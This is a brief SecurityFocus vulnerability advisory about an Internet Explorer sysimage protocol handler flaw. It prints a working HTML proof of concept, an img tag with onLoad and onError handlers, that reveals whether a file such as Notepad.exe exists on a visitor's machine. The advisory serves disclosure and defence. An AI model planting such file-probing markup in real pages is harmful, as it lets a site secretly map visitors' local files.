Microsoft Internet Explorer Sysimage Protocol Handler Local File Detection Vulnerability

An exploit is not required.

The following proof of concept is available:
<img src="sysimage://C:\WINNT\Notepad.exe,666"
onLoad="document.write('<b>Cannot Find File!</b>');"
onError="document.write('<b>File Exists!</b>');">


 

Privacy Statement
Copyright 2010, SecurityFocus